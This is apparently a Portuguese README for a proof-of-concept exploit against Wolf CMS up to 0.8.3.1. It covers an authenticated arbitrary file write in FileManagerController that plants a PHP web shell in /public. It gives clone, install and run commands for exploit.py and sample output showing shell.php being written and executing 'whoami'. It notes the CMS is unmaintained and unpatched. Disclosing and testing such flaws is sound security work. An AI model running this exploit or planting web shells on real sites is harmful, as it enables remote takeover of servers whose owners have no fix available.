
Exploit de PoC para Wolf CMS <= 0.8.3.1: autentica-se no Admin, grava um arquivo PHP arbitrário em /public via FileManagerController e executa comandos através de um web shell.
Este repositório contém um exploit de Prova de Conceito (PoC) para a CVE-2026-67206
Este projeto é fornecido apenas para fins educacionais e testes de segurança autorizados. Não o utilize contra sistemas que você não possui ou para os quais não tem permissão de testar.
Existe uma vulnerabilidade de escrita arbitrária de arquivos nas versões do Wolf CMS até a 0.8.3.1. Ela permite que um atacante autenticado escreva arquivos arbitrários maliciosos no diretório /public da raiz da web por meio das funções create_file() e save() do FileManagerController.php. A função create_file() do FileManagerController.php não valida extensões de arquivo, permitindo assim que atacantes autenticados escrevam scripts PHP maliciosos e obtenham privilégios de execução remota de código.
Um artigo detalhado com análise de código-fonte e demonstração do exploit pode ser encontrado no meu blog Medium.
Todas as versões do Wolf CMS até a 0.8.3.1 são afetadas. O repositório do Wolf CMS foi arquivado em 28 de agosto de 2021 e não é mais mantido ativamente. Atualmente não existem patches para esta vulnerabilidade.
git clone https://github.com/anirbala98/CVE-2026-67206.git
cd CVE-2026-67206/
pip install -r requirements.txt
python exploit.py <base_url> -u <username> -p <password>
python exploit.py http://127.0.0.1:8080/ -u admin -p admin
└─$ python exploit.py http://127.0.0.1:8080/ -u admin -p 12966cc814K
[*] Logging in with provided credentials...
[+] Login successful
[*] Creating a file named shell.php...
[+] File creation successful
[*] Attempting to write payload to shell.php...
[+] Payload written successfully!
[+] Web shell can be accessed with 'cmd' query string at http://127.0.0.1:8080/public/shell.php
[+] Testing output of http://127.0.0.1:8080/public/shell.php?cmd=whoami
www-data